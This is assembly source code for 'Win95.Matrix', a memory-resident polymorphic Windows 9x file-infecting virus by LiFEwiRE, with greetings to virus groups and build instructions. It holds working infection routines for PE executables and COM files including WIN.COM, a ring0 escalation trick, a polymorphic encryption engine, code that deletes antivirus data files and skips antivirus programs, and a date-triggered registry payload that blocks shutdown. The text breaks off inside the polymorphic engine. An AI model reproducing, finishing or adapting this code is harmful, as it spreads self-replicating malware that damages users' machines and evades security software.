; Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
; VX members,
; r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
; people i met on #virus & #vir, and 29A & iKX for their
; nice magazines.
;
; and some non-virus greets:
;
; Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator,
; King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
; PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
;
; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,
; tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
; pewrsec LiFEwiRE.EXE
;
; Contact: Lifewire@mail.ru
;
;
;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
;
;Description at www.viruslist.com
;
;Win95.Matrix
;
;
;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
;stays in the Windows memory as a device driver (VxD) by switching from
;application mode to Windows kernel (Ring3->Ring0), hooks disk files access
;functions, and infect PE executable files with EXE and SCR file name
;extensions, and affects DOS COM files.
;
;While infecting a PE EXE file the virus encrypts itself and writes to the
;file end. The virus also patches program's startup code with a short routine
;that passes control to main virus code.
;
;While affecting DOS COM files the virus writes to the end of file a short
;routine that has no infection abilities, but just displays a message on
;July 7th:
;
; Wake up, Neo...
; The Matrix has you...
; w9x.mATRiX
;
;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
;
;On April 6th the virus modifies the system registry key:
;
;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
;
;As the result of this key a user cannot switch off the computer.
;
;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
;CHKLIST.MS.
;
;The virus contains the text strings:
;
;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]
;
;where 'xxxxxxx' is the virus' "generation" number.
;
;
;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
.486p
.model flat
locals
jumps

extrn ExitProcess:PROC; ;only 4 first gen.

;----- -[Equ's]- ------------------------------------------------------------;

debug equ 1 ;test/debug version?

virusz equ offset end - offset start


sectionflags equ 00000020h or 80000000h or 20000000h

if debug eq 1
inthook equ 05h ;let's hook this int for ring0
else
inthook equ 03h ;let's hook this int for ring0
endif

JmpToCodesz equ offset EndJmpToCode-offset JmpToCode

IFSMgr equ 0040h ;for VxDCall


InstallFileSystemApiHook equ 067h ;used in ring0 hooker
UniToBCSPath equ 041h ;used in hook to convert uni2ansi
Ring0_FileIO equ 032h ;for all file i/o

IFSFN_FILEATTRIB equ 21h ;hooked functions


IFSFN_OPEN equ 24h
IFSFN_RENAME equ 25h

R0_OPENCREATFILE equ 0D500h ;used with ring0_fileIO


R0_CLOSEFILE equ 0D700h
R0_WRITEFILE equ 0D601h
R0_READFILE equ 0D600h
R0_GETFILESIZE equ 0D800h
R0_FILEATTRIBUTES equ 04300h
GET_ATTRIBUTES equ 00h
SET_ATTRIBUTES equ 01h
R0_DELETEFILE equ 04100h

PC_STATIC equ 20000000h ;for allocating pages


PC_WRITEABLE equ 00020000h ;and protecting them from
PC_USER equ 00040000h ;ring3 code
PAGEZEROINIT equ 00000001h
PAGEFIXED equ 00000008h
PG_SYS equ 1

Get_DDB equ 0146h ;VMMCall to find S-ICE

PageAllocate equ 0053h


PageModifyPermissions equ 0133h

SizeInPages equ (virusz+1000 + 4095) / 4096

RegOpenKey equ 0148h ;used by payload for registery


RegSetValueEx equ 0152h ;modifying
HKEY_CURRENT_USER equ 80000001h ;
REG_DWORD equ 4 ;

debug_beep_FREQ equ 1700 ;for debugging


debug_beep_DELAY equ 50*65536

debug_beep_FREQ2 equ 700 ;for debugging


debug_beep_DELAY2 equ 100*65536

;----- -[Macro's]- ----------------------------------------------------------;

VxDCall macro vxd_id, service_id


int 20h
dw service_id
dw vxd_id
endm

VMMCall macro service_id ;Is just less work than doing


int 20h ;a VxDCall VMM, service
dw service_id
dw 0001h
endm

if debug eq 1
; display "Debug Version"
else
display " °±²Û *Warning* This is the real version of the virus Û²±°"
endif

;----- -[Code]- -------------------------------------------------------------;


_CODE segment dword use32 public 'CODE'

start:
pushad

call getdelta
getdelta:
pop ebp
sub ebp,offset getdelta

sub eax,00001000h ;Get imagebase at runtime


newEIP equ $-4

mov dword ptr [imagebase+ebp],eax

pushad

call setupSEHandKillEmu ;The call pushes the offset

mov esp,[esp+8] ;Error gives us old


ESP
jmp backtocode

setupSEHandKillEmu:
xor edx,edx ;fs:[edx] = smaller then fs:[0]
push dword ptr fs:[edx] ;Push original SEH handler
mov fs:[edx],esp ;And put the new one (located
dec byte ptr cs:[edx] ;make error & let our SEH take
;control (not nice 4 emu's:)
backtocode:

pop dword ptr fs:[0]


pop edx ;pops EIP pushed by call setupSEH

popad

call SetupSEH ;to kill errors


;if eip gets here an error has occured

mov esp,[esp+8] ;contains old ESP

jmp RestoreSEH ;...

SetupSEH:
xor edx,edx ;we are save now, if an error
push dword ptr fs:[edx] ;occure EIP will be at the
mov fs:[edx],esp ;code after SetupSEH

push edx
sidt fword ptr [esp-2] ;'push' int table
pop edx ;restore stack from call and
;edx contains pointer to IDT

add edx,(inthook*8)+4 ;Get int vector

mov ebx,dword ptr [edx]


mov bx,word ptr [edx-4]

lea edi,dword ptr [ebp+Inthandler] ;routine to let int point to

mov word ptr [edx-4],di


shr edi,16 ;high/low word
mov word ptr [edx+2],di

int inthook ;call int, int will be ring0!

mov word ptr [edx-4],bx ;Restore old interrupt values


shr ebx,16
mov word ptr [edx+2],bx

RestoreSEH:

xor edx,edx
pop dword ptr fs:[edx]
pop edx ;pops offset pushed by CALL

mov edi,dword ptr [imagebase+ebp] ;--- Restore old bytes ---;


add edi,dword ptr [base+ebp] ;do at it ring0 to avoid
;page errorz
lea esi,[offset oldbytes+ebp]
mov ecx,JmpToCodesz
rep movsb ;restore bytes from host

popad

mov eax,00h ;--- return to host ---;


imagebase equ $-4
add eax,offset host -0400000h ;1st gen
base equ $-4

push eax
ret

;----------------------------------------------------------------------------;
; **** RING0 LOADER ****
;----------------------------------------------------------------------------;
Inthandler:
pushad
mov eax,0bff70404h ;already loaded?
cmp dword ptr [eax],eax
je back2ring3
mov dword ptr [eax],eax

push PAGEFIXED + PAGEZEROINIT


xor eax, eax
push eax ;PhysAddr
push eax ;maxPhys
push eax ;minPhys
push eax ;Align
push eax ;handle of VM = 0 if PG_SYS
push PG_SYS ;allocate memory in system area
push SizeInPages*2 ;nPages
VxD1V equ 00010053h
VxD1: VMMCall PageAllocate
add esp, 8*4

or eax,eax ;eax = place in mem


jz back2ring3 ;if zero error :(

mov edi,eax ;set (e)destination

push eax

push edi
lea esi,[offset start+ebp] ;set source
mov ecx,virusz ;virussize
cld ;you never know with poly :)
rep movsb ;copy virus to allocated mem
pop edi

mov dword ptr [edi+delta-start],edi

lea ecx,[edi+offset hook-offset start] ;Install FileSystem Hook


push ecx
VxD2V equ InstallFileSystemApiHook+256*256*IFSMgr
VxD2: VxDCall IFSMgr,InstallFileSystemApiHook
pop ecx

mov [edi+nexthook-start],eax

pop eax

push PC_STATIC
push 020060000h ;new paging settings
push SizeInPages*2
shr eax, 12
push eax
VxD5V equ 00010133h
VxD5: VMMCall PageModifyPermissions
add esp, 4*4

call CheckThePayloadDate ;(and mayB do something:)

if debug eq 1
call debug_beep2
endif

back2ring3:
if debug eq 1
call debug_beep
endif

popad
iretd ;exit int (to ring3!)
;----------------------------------------------------------------------------;

host:
oldbytes:
Push 0
Call ExitProcess
db JmpToCodesz-5 dup (176d)

;----------------------------------------------------------------------------;
; **** FILESYSTEM HOOK ****
;----------------------------------------------------------------------------;

hook:
push ebp
mov ebp,esp

sub esp,20h

push ebx
push esi
push edi

db 0bfh ;mov edi,DeltaInMem


delta dd 0

cmp dword ptr [busy-start+edi],not "BuSY" ;...are we busy?


je back

if debug eq 1
cmp dword ptr [death-start+edi],'TRUE'
je back
endif

mov eax,dword ptr [ebp+0Ch] ;EAX = Function


not eax

cmp eax,not IFSFN_OPEN ;File Open? try it


jz infect

cmp eax,not IFSFN_RENAME ;Rename? try it


jz infect

cmp eax,not IFSFN_FILEATTRIB ;File Attributes? try it


jz infect

back:
mov eax,[ebp+28] ; call the old
push eax
mov eax,[ebp+24]
push eax
mov eax,[ebp+20]
push eax
mov eax,[ebp+16]
push eax
mov eax,[ebp+12]
push eax
mov eax,[ebp+8]
push eax

db 0b8h
nexthook dd 0
call [eax]

add esp,6*4

pop edi
pop esi
pop ebx

leave
ret

;----------------------------------------------------------------------------;
; **** SOME CHECKS BEFORE INFECTING ****
;----------------------------------------------------------------------------;

infect:
pushad

if debug eq 1
mov eax,0bff70400h
mov eax,dword ptr [eax]
or eax,eax
jz stayalive ;kill ourself?

mov dword ptr [edi+death-start],'TRUE'

call debug_beep
call debug_beep2
call debug_beep2
call debug_beep2
call debug_beep

mov eax,0bff70400h

xor edx,edx
mov dword ptr [eax],edx
mov dword ptr [eax+4],edx

stayalive:

endif

mov dword ptr [busy-start+edi],not 'BuSY'

lea esi, [edi+filename-start] ;file buffer

mov eax, dword ptr [ebp+16]


cmp al,0ffh ;no drive defined?
je nopath
add al,40h ;a=1,b=2,a+40h='A',b+40h='B'
mov byte ptr [esi],al
mov word ptr [esi+1],':'
add esi,2
nopath:
xor eax,eax
push eax ;push 0 ;BCS/WANSI
inc ah ;ax=100h
push eax ;push 100h ;buf size
mov eax,[ebp+28]
mov eax,[eax+12]
add eax,4
push eax ;filename
push esi ;destination (buffer)

VxD3V equ UniToBCSPath+256*256*IFSMgr


VxD3: VxDCall IFSMgr, UniToBCSPath ;Convert to ASCII

add esp,4*4 ;restore stack


add esi,eax ;eax = lenght
mov byte ptr [esi],0 ;make ASCIIZ

mov eax,dword ptr [esi-4]

not eax ;
cmp eax,not 'EXE.' ;normal exe?
je infectit

cmp eax,not 'RCS.' ;screensaver?


je infectit

cmp eax,not 'MOC.' ;a com? (indeed !!:)


jne nocomfile
jmp payloadinfector
nocomfile:

quitinfect:

mov dword ptr [busy-start+edi],eax ;hope eax <> 'busy' :)


popad

jmp back

db "<w9x.mATRiX."
db virusz/1000 mod 10+'0'
db virusz/0100 mod 10+'0'
db virusz/0010 mod 10+'0'
db virusz/0001 mod 10+'0',"."
counter db "0001086 & MyLittlePoly." ;enough space for counter :)
db polysz/1000 mod 10+'0'
db polysz/0100 mod 10+'0'
db polysz/0010 mod 10+'0'
db polysz/0001 mod 10+'0'

if debug eq 1
db " Debug Version"
endif

db " by LiFEwiRE [sHAD0WvX]>"

dontinfect: ;when attrs. were already modified


pop esi ;get attribs + 1 = set
pop ecx ;old attrs
pop eax ;pointer to buffer with filen.
call R0_FileIO ;RESTORE ATTRIBUTES
jmp quitinfect

cryptkey dd 0
cryptkey2 dw 0
;----------------------------------------------------------------------------;
; **** REAL PE INFECTION PART ****
;----------------------------------------------------------------------------;

infectit:

lea esi, [edi+filename-start]

call checkname
jc quitinfect ;if name = bad

if debug eq 1
cmp word ptr [esi],":D"
jne quitinfect
endif

mov eax,R0_FILEATTRIBUTES + GET_ATTRIBUTES


push eax
call R0_FileIO

pop eax
inc eax ;eax=4300+1 = set
push eax
push ecx ;save attribs
push esi ;and esi,no new LEA needed
xor ecx,ecx ;new attr
call R0_FileIO

xor ecx,ecx ;ecx=0


mov edx,ecx ;
inc edx ;edx=1
mov ebx,edx ;
inc ebx ;ebx=2
mov eax,R0_OPENCREATFILE
call R0_FileIO
jc dontinfect

mov ebx,eax ;file handle

lea esi,[edi+pointertope-start] ;read pointer to PE at 3ch


mov ecx,4 ;into pointertope
mov edx,03ch
mov eax,R0_READFILE
call R0_FileIO

lea esi,[edi+peheader-start] ;peheader buffer


mov ecx,1024 ;1024 bytes
mov edx,dword ptr [edi+pointertope-start] ;pointer to pe header
mov eax,R0_READFILE ;...
call R0_FileIO

cmp word ptr [esi],'EP' ;is pe?


jne nope ;nope, its noPE :)

mov eax,0badc0deh ;already infected?


cmp dword ptr [esi+4ch],eax ;4ch = reserved
je nope
mov dword ptr [esi+4ch],eax

push ebp
push edi
push ebx ;save handle for after calcs.
mov ebp,edi

mov edi,esi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
;optionalheader+size=allocation table

;edi = PE/0/0, esi = allocation table

push esi
xor ecx,ecx
mov cx,word ptr [edi+6] ;put in ecx nr. of sections
xor eax,eax ;startvalue of eax
push cx ;
sectionsearch:
cmp dword ptr [esi+14h],eax ;is it the highest?
jb lower ;no
mov ebx,ecx ;remember section nr.
mov eax,dword ptr [esi+14h] ;and remember value
lower:
add esi,28h ;steps of 28h
loop sectionsearch
pop cx

sub ecx,ebx

mov eax,28h ;multiply with section length


mul ecx
pop esi
add esi,eax ;esi points now to section header

; Section header layout, Tdump names things other (4 example rawdata)


;
;esi+0h 8h Section's name (.reloc, .idata, .LiFEwiRE)
; 8h 4h VirtualSize
; 0ch 4h RelativeVirtualAdress
; 10h 4h SizeOfRawData
; 14h 4h PointerToRawData
; 18h 4h PointerToRelocations
; 1ch 4h PointerToLinenumbers
; 20h 2h NumberOfRelocations
; 22h 2h NumberOfLinenumbers
; 24h 4h Characteristics

; ESI points to Section header, EDI points to PE

or [esi+24h],sectionflags ; Update section's flagz

mov edx,[esi+10h] ; EDX = SizeOfRawData


mov eax,edx ; EAX = SizeOfRawData
add edx,[esi+0Ch] ; EDX = New EIP
add eax,[esi+14h] ; EAX = Where append virus
push eax ; Save it

push esi

add eax,[esi+0Ch]
mov [edi+50h],eax

mov eax,[edi+28h] ;backup entry RVA


mov dword ptr [ebp+base-start],eax ;...
mov dword ptr [ebp+newEIP-start],edx ;save it
add edx,dword ptr [edi+34h] ;edx=neweip+imagebase

mov dword ptr [ebp+distance-start],edx ; Store the address

mov esi,edi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH

;ESI points to the allocation table,EDI to PE

;lets find the section which contains the RVA.

;then the place where to put the jump is entry-rva+phys.

sub esi,28h

look: add esi,28h


mov edx,eax ;Old EntryPoint (RVA)
sub edx,dword ptr [esi+0Ch] ;VirtualAddres
cmp edx,dword ptr [esi+08h] ;VirtualSize
jae look

sub eax,dword ptr [esi+0ch] ;sub RVA


add eax,dword ptr [esi+14h] ;add PhysicalOffset
;EAX is now the PhysicalOffset
;of the EntryPoint

or [esi+24h],sectionflags ; Update section's flagz

pop esi
pop edx
pop ebx

push edx ;
push esi
push eax

lea esi,[ebp+oldbytes-start] ;read pointer to PE at 3ch


mov ecx,JmpToCodesz ;into pointertope
mov edx,eax
mov eax,R0_READFILE
call R0_FileIO

mov word ptr [ebp+randombla-start],ax ;random value

pop edx ;and write new bytes at entry


lea esi,[ebp+JmpToCode-start] ;point to make code jmp to
mov eax,R0_WRITEFILE ;the section which contains
mov ecx,JmpToCodesz ;the viruscode (modifying the
call R0_FileIO ;entry RVA will alert AV's)

call VxDPatch ;unpatch VxDCalls (and VMM)

call IncCounter ;a ASCII counter rules

call encrypt ;encrypt,createpoly,returnsize (in ecx)

;encrypt-^ returns the virus size in ecx

mov eax,ecx
mov ecx,[edi+3Ch] ;ECX = Alignment
push edx ; Align
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
mov ecx,eax ;aligned size to append

pop esi

add [esi+10h],eax ; Size of rawdata


mov eax,[esi+10h] ;
add [esi+08h],eax ; & virtual size

pop edx
push edi
lea esi,[ebp+viruscopy-start] ;polymorfer returns size in
mov eax,R0_WRITEFILE ;the ECX register
push eax
call R0_FileIO ;append virus

pop eax
pop esi
mov ecx,1024
mov edx,[ebp+pointertope-start]
call R0_FileIO ;overwrite PE header

pop edi
pop ebp

nope:
mov eax,R0_CLOSEFILE
call R0_FileIO

if debug eq 1
call debug_beep
endif

call killAVfiles
call infectwindotcom ;for payload

jmp dontinfect

windotcom db "C:\WINDOWS\WIN.COM",0h ;for payload


sizewdc equ $-offset windotcom

avpcrc db 9,"AVP.CRC",0h
antivirdat db 14,"ANTI-VIR.DAT",0h
ivbntz db 9,"IVB.NTZ",0h
chklistms db 12,"CHKLIST.MS",0h

killAVfiles:
pushad
;first add the path to the filename
mov ebp,edi

lea edx,[offset avpcrc-start+ebp]

mov ecx,4
killing:
call killthisfile
xor ebx,ebx
mov bl,byte ptr [edx]
add edx,ebx
loop killing

popad

ret

killthisfile:
pushad
lea edi,[offset filename-start+ebp]
push edi

mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1

std
mov al,'\' ;search from right to left for the \
scasb
jne $-1

xor ecx,ecx

inc edi ;edi pointed to char before \


inc edi ;edi pointed to \

cld

mov esi,edx
lodsb
mov cl,al
rep movsb

pop esi
mov eax,R0_DELETEFILE
mov ecx,2027h
call R0_FileIO
popad
ret

;--------------------------------------------------------------------------
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
;--------------------------------------------------------------------------

infectwindotcomflag db 0h

infectwindotcom: ;called if virus is not resident


pushad
mov byte ptr [edi+offset infectwindotcomflag-start],'!'

push edi

lea esi,[offset windotcom-start+edi]


lea edi,[offset filename-start+edi]
mov ecx,sizewdc
cld
rep movsb
pop edi

jmp payloadinfector

backfrominfecting:

mov byte ptr [edi+offset infectwindotcomflag-start],173d ;-


popad
ret

;--------------------------------------------------------------------------

jmpop dw 0e990h ;nop & jmp


jmpval dw ?

;--------------------------------------------------------------------------

payloadinfector:
if debug eq 1
cmp dword ptr [esi-8],'PRUB' ;*BURP.COM ?
jne wegvancom
endif

lea esi, [edi+filename-start]

xor ecx,ecx ;ecx=0


mov edx,ecx ;
inc edx ;edx=1
mov ebx,edx ;
inc ebx ;ebx=2
mov eax,R0_OPENCREATFILE
call R0_FileIO
jc wegvancom

mov ebx,eax ;file handle

lea esi,[edi+first4bts-start] ;read first 4 bytes


mov ecx,4
xor edx,edx
mov eax,R0_READFILE
call R0_FileIO

cmp word ptr [edi+first4bts-start],'ZM' ;a renamed EXE ??


je closecomfile

cmp word ptr [edi+first4bts-start],0e990h ;already infected?


je closecomfile

mov eax,R0_GETFILESIZE
call R0_FileIO ;get it's size

cmp eax,0ffffh-0100h-dospayloadsize ;infectable?


ja closecomfile

push eax

sub eax,4
mov word ptr [edi+jmpval-start],ax ;distance to jmp

lea esi,[edi+offset jmpop-start] ;Write new jMP at 0h


mov eax,R0_WRITEFILE
mov ecx,4
xor edx,edx
push eax
call R0_FileIO

pop eax
pop edx ;place to append
push edx
lea esi,[edi+offset dospayload-start]
mov ecx,dospayloadsize
call R0_FileIO

pop edx ;read 7 bytes before the end


push edx
sub edx,7
mov ecx,7
mov eax,R0_READFILE
lea esi,[edi+offset filename-start] ;just a buffer
call R0_FileIO

pop edx

cmp word ptr [edi+offset filename-start+3],'SN' ;ENUNS? (ENU is


jne closecomfile ;optional)

add word ptr [edi+offset filename-start+5],dospayloadsize+7

mov ecx,7

lea esi,[edi+offset filename-start]


mov eax,R0_WRITEFILE
add edx,dospayloadsize
call R0_FileIO ;append updated ENUNS

closecomfile:
mov eax,R0_CLOSEFILE
call R0_FileIO

wegvancom:

if debug eq 1
call debug_beep
endif

cmp byte ptr [edi+offset infectwindotcomflag-start],'!'


je backfrominfecting

jmp quitinfect

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; *** BEEPS used if debug equ 1 ***
;--------------------------------------------------------------------------

if debug eq 1
debug_beep:
push eax
push ecx

mov eax,0bff70408h
cmp byte ptr [eax],0
jne geenirritantgebiepvandaag

mov al, 0B6h


out 43h, al

mov al, (12345678h/debug_beep_FREQ) and 255


out 42h, al
mov al, ((12345678h/debug_beep_FREQ) shr 16) and 255
out 42h, al

in al, 61h
or al, 3
out 61h, al

mov ecx, debug_beep_DELAY


loop $

in al, 61h
and al, not 3
out 61h, al

pop ecx
pop eax
ret

debug_beep2:
push eax
push ecx

mov al, 0B6h


out 43h, al

mov al, (12345678h/debug_beep_FREQ2) and 255


out 42h, al
mov al, ((12345678h/debug_beep_FREQ2) shr 16) and 255
out 42h, al

in al, 61h
or al, 3
out 61h, al

mov ecx, debug_beep_DELAY2


loop $

in al, 61h
and al, not 3
out 61h, al

geenirritantgebiepvandaag: ;blaa dit versta jij toch niet looser :P

pop ecx
pop eax
ret
endif

;--------------------------------------------------------------------------
; File IO function, called lot of times, better for patching callback
;--------------------------------------------------------------------------

R0_FileIO:
VxD4V equ Ring0_FileIO+256*256*IFSMgr
VxD4: VxDCall IFSMgr, Ring0_FileIO
ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; Increases the ASCII counter of infections
;--------------------------------------------------------------------------

IncCounter: ;counts a ASCII counter... when there are more than


;9999999 files infected it contains a bug, but i don't
lea esi,[offset counter-start+6+ebp] ;expect that from this vir :)

next:
inc byte ptr [esi]
cmp byte ptr [esi],'9'+1
jb ok
mov byte ptr [esi],'0'
dec esi
jmp next
ok:
ret

;--------------------------------------------------------------------------

;------------------------------------------------------------------------------
; Some things used in the registery payload
;------------------------------------------------------------------------------

KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
valuename1 db "NoClose",0h ;no shutdown :)
ValueToSet dd 1h

CheckThePayloadDate:

mov al,07h ;Get day


out 70h,al ;(returns it in hex btw!)
in al,71h

cmp al,06h ;Is it 6th?


jnz noPayload

mov al,08h ;Get month


out 70h,al ;(returns it in hex btw!)
in al,71h

cmp al,04h ;Is it 4th?


jnz noPayload ;(

lea eax,[offset pointertope+ebp] ;just a buffer


push eax
lea eax,[offset KeyOfPolicies+ebp] ;open this key
push eax
push HKEY_CURRENT_USER ;
VxD6V equ RegOpenKey+256*256*1
VxD6: VMMCall RegOpenKey

add esp,3*4 ;reset stackpointer


push 4 ;length of value
lea eax,[offset ValueToSet+ebp] ;set value true
push eax
push REG_DWORD ;type
push 0 ;reserved
lea eax,[offset valuename1+ebp]
push eax
push [pointertope+ebp] ;handle
VxD7V equ RegSetValueEx+256*256*1 ;1 = VMM
VxD7: VMMCall RegSetValueEx

add esp,6*4

noPayload:
ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; Patches the VxDCalls (on execute windows modifies them to a real call)
;--------------------------------------------------------------------------

VxDPatch:
pushad
mov bx,020cdh ;int 20 used by VxDCall

mov word ptr [VxD1-start+ebp],bx ;int 20


mov dword ptr [VxD1-start+ebp+2],VxD1V ;dd with IFSMGR & fn.

mov word ptr [VxD2-start+ebp],bx


mov dword ptr [VxD2-start+ebp+2],VxD2V

mov word ptr [VxD3-start+ebp],bx


mov dword ptr [VxD3-start+ebp+2],VxD3V

mov word ptr [VxD4-start+ebp],bx


mov dword ptr [VxD4-start+ebp+2],VxD4V

mov word ptr [VxD5-start+ebp],bx


mov dword ptr [VxD5-start+ebp+2],VxD5V

mov word ptr [VxD6-start+ebp],bx


mov dword ptr [VxD6-start+ebp+2],VxD6V

mov word ptr [VxD7-start+ebp],bx


mov dword ptr [VxD7-start+ebp+2],VxD7V

popad
ret

;--------------------------------------------------------------------------

rnd32_seed dd 0h

;------ this code is putted at EIP of host and jmps to virus code -----------;
JmpToCode:
stc
db 066h,0fh,083h ;jnc
randombla dw ? ;some place
mov eax,12345678h
distance equ $-4
push eax
ret
EndJmpToCode:
;----------------------------------------------------------------------------;

;this sweet code will be appended to .com files (234 / 0eah bytes large)

dospayload label byte


db 0e8h,09h,00h,0ebh,012h,08bh,0ech,083h,0c4h,020h,0ebh,04h,0ebh
db 0fch,0cdh,021h,0e8h,02ch,00h,0ebh,0eeh,0e2h,0f9h,058h,08bh
db 0ech,02dh,03h,01h,0fbh,095h,0b4h,04ch,080h,0ech,022h,0cdh,021h
db 080h,0feh,07h,075h,05h,080h,0fah,07h,074h,017h,0beh,0eah,01h
db 03h,0f5h,0bfh,00h,01h,0a5h,0a5h,0b8h,00h,01h,050h,0c3h,0ebh
db 05h,0b8h,00h,04ch,0cdh,021h,0c3h,0beh,058h,01h,03h,0f5h,08bh
db 0feh,0b9h,092h,00h,0fch,0ach,0f6h,0d8h,0aah,0e2h,0fah,018h
db 07dh,00h,098h,00h,048h,0f9h,047h,0f6h,00h,018h,08dh,00h,042h
db 070h,0ffh,0fdh,0bh,018h,0a8h,00h,018h,0abh,00h,047h,0d4h,0ffh
db 018h,09eh,00h,018h,0b4h,00h,06h,015h,02h,0a0h,04ch,0d4h,033h
db 0dfh,076h,026h,04ch,0d4h,033h,0dfh,0d6h,02dh,080h,06h,0ech
db 08eh,0bh,09fh,03dh,0a9h,09fh,095h,09bh,0e0h,08bh,090h,0d4h
db 0e0h,0b2h,09bh,091h,0d2h,0d2h,0d2h,00h,0ach,098h,09bh,0e0h
db 0b3h,09fh,08ch,08eh,097h,088h,0e0h,098h,09fh,08dh,0e0h,087h
db 091h,08bh,0d2h,0d2h,0d2h,00h,089h,0c7h,088h,0d2h,093h,0bfh
db 0ach,0aeh,097h,0a8h,0e0h,0adh,0aah,0a8h,00h,018h,0eah,00h,0cdh
db 01h,04ch,0f6h,054h,055h,018h,055h,01h,0f6h,040h,08bh,09h,047h
db 0e2h,00h,018h,05fh,01h,01eh,05h,03dh,048h,0fdh,00h,033h,0f0h
db 04ch,0ffh,04bh,0e0h,033h,0f0h,03dh
first4bts dd ? ;the first 4 overwritten bytes from the host
dospayloadsize equ $-offset dospayload

badnames label byte


db 04h,"_AVP" ;_AVP files
db 03h,"NAV" ;Norton AV
db 02h,"TB" ;Tbscan, Tbav32, whole shit
db 02h,"F-" ;F-Prot
db 03h,"PAV" ;Panda AV
db 03h,"DRW" ;Doc. Web
db 04h,"DSAV" ;Doc. Salomon
db 03h,"NOD" ;NodIce
db 03h,"SCA" ;SCAN
db 05h,"NUKEN" ;Nukenabber? (error with infecting)
db 04h,"YAPS" ;YetAnotherPortScanner (selfcheck)
db 03h,"HL." ;HalfLife (thx to Ghostie!)
db 04h,"MIRC" ;mIRC = strange
db 0h

;--------------------------------------------------------------------------
; * Checks the name of the file to be infected
;--------------------------------------------------------------------------

checkname: ;check for some bad names


pushad

mov ebp,edi ;delta


mov edi,esi ;points to filename

mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1

inc edi ;edi pointed to char before \


inc edi ;edi pointed to \

cld

lea esi,[offset badnames+ebp-start]

checkname2:
xor eax,eax ;for load AL
lodsb ;size of string in al
or al,al
jz didit
mov ecx,eax ;counter for bytes
push edi ;save pointer to filename
rep cmpsb ;compare stringbyte
pop edi
jz ArghItIsAshitFile
add esi,ecx
jmp checkname2

ArghItIsAshitFile:
popad
stc
ret
didit:
popad
clc
ret
;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; *** POLYMORFIC engine which generates decrypter & encrypts code ***
;--------------------------------------------------------------------------

;
; The generated code will look like this:
;
; pushad
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
; mov keyregister,randomvalue
; sub keyregister,randomvalue
; mov counterreg,size
; again:
; mov tempregister,[RegUsedAsPointer]
; xor tempregister,keyregister
; mov [RegUsedAsPointer],tempregister
; add RegUsedAsPointer,4
; dec counterreg
; pushf
; popf
; jz exit
; jmp again
; exit:
;
;
; between each instruction some random code is putted.
polysz equ offset polyend - offset encrypt
encrypt:
push eax
push ebx
push edx
push esi
push edi

lea edi,[offset viruscopy+ebp-start] ;edi points to buffer

call gengarbage

;--------PUSHAD--
mov al,60h ;pushad
stosb
;--------MOV-----

call gengarbage

getregforoffset: ;This reg will contain the offset of code


call getrndal
cmp al,4 ;do not use ESP
je getregforoffset
cmp al,5 ;do not use EBP (!)
je getregforoffset

mov ch,al ;backup register for offset code

;--LEA reg,[EAX+x]- ;lea


shl al,3
mov ah,08dh
xchg ah,al
add ah,080h
push edi ;save location for patch
stosw
stosd ;doesn't matter what we store
;------------------

call gengarbage

getregforkey: ;This reg will contain the crypt key


call getrndal
cmp al,4 ;do not use ESP
je getregforkey
cmp al,1 ;do not use ECX
je getregforkey
cmp al,ch
je getregforkey

mov cl,al ;backup register

call gengarbage

;--------MOV-----
add al,0b8h ;make a MOV reg, rndvalue
stosb
call get_rnd32
stosd
;----------------

mov ebx,eax ;backup key


mov ah,cl ;register back in ah

call gengarbage

;--------SUB-----
mov al,081h ;make a SUB reg, rndvalue
add ah,0e8h
stosw
call get_rnd32
stosd
;----------------

sub ebx,eax ;Save the cryptkey

getregforsize:
call getrndal
cmp al,4 ;do not use ESP
je getregforsize
cmp al,cl ;nor keyreg
je getregforsize
cmp al,ch ;nor offsetreg
je getregforsize

mov dh,al

call gengarbage

;----MOVSIZE----- ;mov ecx,virussize (size to decrypt)


add al,0b8h
stosb
mov eax,virusz/4
stosd
;----------------

;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***

mov esi,edi

;8b + 00, eax=3,[eax=0] ch = reg2

getregtoxor: ;This reg will contain crypted code and'll be xored


call getrndal
cmp al,4 ;do not use ESP
je getregtoxor
cmp al,cl
je getregtoxor ;do not use the keyreg
cmp al,ch
je getregtoxor ;do not use the offset reg
cmp al,dh
je getregtoxor

mov dl,al
call gengarbage

;-MOV REG3,[REG2] ;make a mov reg3,[reg2] reg2=offset code


shl al,3
or al,ch
mov ah,08bh
